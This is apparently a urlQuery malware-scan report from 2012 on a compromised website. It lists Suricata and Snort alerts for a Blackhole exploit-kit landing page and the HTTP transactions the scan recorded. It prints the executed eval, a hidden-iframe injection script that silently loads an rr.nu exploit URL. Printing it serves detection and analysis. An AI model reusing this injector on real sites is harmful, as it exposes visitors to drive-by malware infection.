Overview

URLhttp://www.maximumadvantage.com/contact_info/index.htm
IP198.170.254.65
ASNAS2914 NTT America, Inc.
Location United States
Report completed2012-11-07 09:55:56 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection
Detected a TDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-07 09:55:21 198.170.254.65 urlQuery Client2ET CURRENT_EVENTS Blackhole Try Prototype Catch June 11 2012
2012-11-07 09:55:22 67.208.74.71 urlQuery Client3ET RBN Known Russian Business Network IP (276)
2012-11-07 09:55:22 67.208.74.12 urlQuery Client3ET RBN Known Russian Business Network IP (276)
2012-11-07 09:55:22 urlQuery Client 67.208.74.712ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 urlQuery Client 173.194.69.1552ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 urlQuery Client 67.208.74.122ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 urlQuery Client 67.208.74.122ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 urlQuery Client 173.194.69.1002ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 urlQuery Client 173.194.69.1552ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 urlQuery Client 67.208.74.122ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 urlQuery Client 67.208.74.122ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:24 urlQuery Client 173.194.69.1552ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:24 urlQuery Client 173.194.69.1572ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:24 urlQuery Client 173.194.69.1002ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-07 09:55:21 198.170.254.65 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-07 09:55:21 198.170.254.65 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-07 09:55:21 198.170.254.65 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch


Recent reports on same IP/ASN/Domain

Last 4 reports on IP: 198.170.254.65

Date Alerts / IDS URL IP
2012-11-14 18:15:422 / 15http://www.maximumadvantage.com/communication-skills-information/communication-skills (...)198.170.254.65
2012-11-14 18:15:392 / 17http://maximumadvantage.com/communication-skills-information/communication-skills198.170.254.65
2012-11-13 13:01:082 / 5http://www.maximumadvantage.com/communication-skills-information/communication-skills198.170.254.65
2012-10-25 18:45:092 / 14http://www.maximumadvantage.com/communication-skills-information/communication-skills (...)198.170.254.65

Last 6 reports on ASN: AS2914 NTT America, Inc.

Date Alerts / IDS URL IP
2013-02-13 07:52:461 / 5http://www.cathair.com/cheri/biograph.htm204.202.246.154
2013-02-13 07:03:210 / 1http://aluna.com.au/wordpress/204.42.128.109
2013-02-13 06:07:470 / 0http://a204-2-179-9.deploy.akamaitechnologies.com204.2.179.9
2013-02-13 05:43:233 / 2http://hawaiiconference.com/presente.htm128.121.134.136
2013-02-13 01:53:042 / 0http://209.238.101.32/ministry-teams/tiny-treasures-2/209.238.101.32
2013-02-13 00:42:570 / 0http://204.202.251.236/cgi-bin/4113-12/SSWEB95.EXE204.202.251.236

Last 3 reports on domain: www.maximumadvantage.com

Date Alerts / IDS URL IP
2012-11-14 18:15:422 / 15http://www.maximumadvantage.com/communication-skills-information/communication-skills/198.170.254.65
2012-11-13 13:01:082 / 5http://www.maximumadvantage.com/communication-skills-information/communication-skills198.170.254.65
2012-10-25 18:45:092 / 14http://www.maximumadvantage.com/communication-skills-information/communication-skills/198.170.254.65



JavaScript

Executed Scripts (11)


Executed Evals (1)

#1 JavaScript::Eval (size: 569, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://ouyqmiuopsa.rr.nu/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://ouyqmiuopsa.rr.nu/?go=2');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

Executed Writes (5)

#1 JavaScript::Write (size: 646, repeated: 1) 

<!doctype html><html><body><script>google_ad_channel="";google_ad_client="pub-2844624690808284";google_ad_format="728x90_as";google_ad_height=90;google_ad_type="text_image";google_ad_width=728;google_color_bg="FFFFFF";google_color_border="FFFFFF";google_color_link="0000FF";google_color_text="000000";google_color_url="008000";google_show_ads_impl=true;google_unique_id=1;google_async_iframe_id="aswift_0";google_ad_unit_key="2793510391";google_start_time=1352278523607;google_expand_experiment="none";google_bpp=12;</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20121031/r20120730/show_ads_impl.js"></script></body></html>

#2 JavaScript::Write (size: 906, repeated: 1) 

<iframe id="google_ads_frame1" name="google_ads_frame1" width="728" height="90" frameborder="0" src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2844624690808284&format=728x90_as&output=html&h=90&w=728&ad_type=text_image&ea=0&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.0.45&url=http%3A%2F%2Fwww.maximumadvantage.com%2Fcontact_info%2Findex.htm&dt=1352278523607&bpp=12&shv=r20121031&jsv=r20110914&correlator=1352278523946&frm=24&adk=2793510391&ga_vid=19684077.1352278524&ga_sid=1352278524&ga_hid=1594549348&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=arial&dfs=11&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=10&ish=10&ifk=3215810476&oid=3&fu=0&ifi=1&dtd=348" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>

#3 JavaScript::Write (size: 766, repeated: 1) 

<ins style="display:inline-table;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:728px"><ins id="aswift_0_anchor" style="display:block;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:728px"><iframe allowtransparency="true" frameborder="0" height="90" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="728" id=aswift_0 name=aswift_0 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#4 JavaScript::Write (size: 84, repeated: 1) 

<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>

#5 JavaScript::Write (size: 105, repeated: 1) 

<script>google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad);</script>


HTTP Transactions (24)


Request Response 
GET /contact_info/index.htm HTTP/1.1

Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Wed, 07 Nov 2012 08:55:21 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /Copy%20of%20maximum_advantage_0405/maximum_advantage_comm/style.css HTTP/1.1

Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.maximumadvantage.com/contact_info/index.htm
 
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1

Date: Wed, 07 Nov 2012 08:55:21 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Location: http://www.maximumadvantage.com/
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
GET / HTTP/1.1

Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.maximumadvantage.com/contact_info/index.htm
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Wed, 07 Nov 2012 08:55:21 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=9g2e44eksq4ckc4ohgu5ag31j4; path=/
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /?go=2 HTTP/1.1

Host: ouyqmiuopsa.rr.nu

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.maximumadvantage.com/contact_info/index.htm
 
HTTP/1.1 301 Moved Permanently

Content-Type: httpd/unix-directory

Date: Wed, 07 Nov 2012 08:55:22 GMT
Server: Apache/1.3.34 (Debian) mod_perl/1.29
Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
Content-Length: 0
Connection: close
GET /redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.maximumadvantage.com/contact_info/index.htm
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Wed, 07 Nov 2012 08:55:22 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /pagead/show_ads.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
If-None-Match: 15032493890200785914
 
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 11458789474174950078
Date: Wed, 07 Nov 2012 08:01:17 GMT
Expires: Wed, 07 Nov 2012 09:01:17 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5118
X-XSS-Protection: 1; mode=block
Age: 3246
Cache-Control: public, max-age=3600
GET /image_files/badge_riskfree.gif HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 2459
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /include_files/css/sitelutions1.css HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
 
HTTP/1.1 200 OK

Content-Type: text/css

Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:23 GMT
Accept-Ranges: bytes
Content-Length: 4200
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /image_files/sl_logo.png HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:22 GMT
Accept-Ranges: bytes
Content-Length: 8913
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /pagead/js/r20121031/r20120730/show_ads_impl.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
 
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 5206557930112377484
Date: Tue, 06 Nov 2012 19:40:17 GMT
Expires: Tue, 20 Nov 2012 19:40:17 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 19221
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 47706
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
 
HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Wed, 07 Nov 2012 01:09:09 GMT
Expires: Wed, 07 Nov 2012 13:09:09 GMT
Vary: Accept-Encoding
Age: 27974
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /image_files/bg-blurbs-is.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:17 GMT
Accept-Ranges: bytes
Content-Length: 12143
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /image_files/badge_uptime.gif HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 1628
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /image_files/logo_bbbonline.gif HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:22 GMT
Accept-Ranges: bytes
Content-Length: 2994
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /image_files/dot.gif HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:17 GMT
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /image_files/bg-blurbs-bm.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 13308
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /image_files/bg-blurbs-cb.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
 
HTTP/1.1 200 OK

Content-Type: image/jpeg

Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 10253
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /pagead/osd.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
If-None-Match: 13350759849962699205
 
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 6549576333968007708
Date: Wed, 07 Nov 2012 08:09:12 GMT
Expires: Wed, 07 Nov 2012 09:09:12 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5986
X-XSS-Protection: 1; mode=block
Age: 2772
Cache-Control: public, max-age=3600
GET /pagead/ads?client=ca-pub-2844624690808284&format=728x90_as&output=html&h=90&w=728&ad_type=text_image&ea=0&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.0.45&url=http%3A%2F%2Fwww.maximumadvantage.com%2Fcontact_info%2Findex.htm&dt=1352278523607&bpp=12&shv=r20121031&jsv=r20110914&correlator=1352278523946&frm=24&adk=2793510391&ga_vid=19684077.1352278524&ga_sid=1352278524&ga_hid=1594549348&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=arial&dfs=11&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=10&ish=10&ifk=3215810476&oid=3&fu=0&ifi=1&dtd=348 HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-2844624690808284&amp;format=728x90_as&amp;output=html&amp;h=90&amp;w=728&amp;ad_type=text_image&amp;ea=0&amp;color_bg=FFFFFF&amp;color_border=FFFFFF&amp;color_link=0000FF&amp;color_text=000000&amp;color_url=008000&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.maximumadvantage.com%2Fcontact_info%2Findex.htm&amp;dt=1352278523607&amp;bpp=12&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352278523946&amp;frm=24&amp;adk=2793510391&amp;ga_vid=19684077.1352278524&amp;ga_sid=1352278524&amp;ga_hid=1594549348&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=11&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=10&amp;ish=10&amp;ifk=3215810476&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=348 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
 
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8

P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Wed, 07 Nov 2012 08:55:24 GMT
Server: cafe
Cache-Control: private
Content-Length: 82
X-XSS-Protection: 1; mode=block
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=106603270&utmhn=domainpark.sitelutions.com&utmcs=UTF-8&utmsr=1176x885&utmvp=10x10&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Redirection%20Not%20Found%20ouyqmiuopsa.rr.nu&utmhid=1594549348&utmr=http%3A%2F%2Fwww.maximumadvantage.com%2Fcontact_info%2Findex.htm&utmp=%2Fredir_not_found%2Fredir_not_found.shtml%3Fouyqmiuopsa.rr.nu&utmac=UA-9495639-6&utmcc=__utma%3D90851141.1332034523.1352278524.1352278524.1352278524.1%3B%2B__utmz%3D90851141.1352278524.1.1.utmcsr%3Dmaximumadvantage.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fcontact_info%2Findex.htm%3B&utmu=DB~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=106603270&amp;utmhn=domainpark.sitelutions.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=10x10&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Redirection%20Not%20Found%20ouyqmiuopsa.rr.nu&amp;utmhid=1594549348&amp;utmr=http%3A%2F%2Fwww.maximumadvantage.com%2Fcontact_info%2Findex.htm&amp;utmp=%2Fredir_not_found%2Fredir_not_found.shtml%3Fouyqmiuopsa.rr.nu&amp;utmac=UA-9495639-6&amp;utmcc=__utma%3D90851141.1332034523.1352278524.1352278524.1352278524.1%3B%2B__utmz%3D90851141.1352278524.1.1.utmcsr%3Dmaximumadvantage.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fcontact_info%2Findex.htm%3B&amp;utmu=DB~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Thu, 01 Nov 2012 01:21:37 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 545627
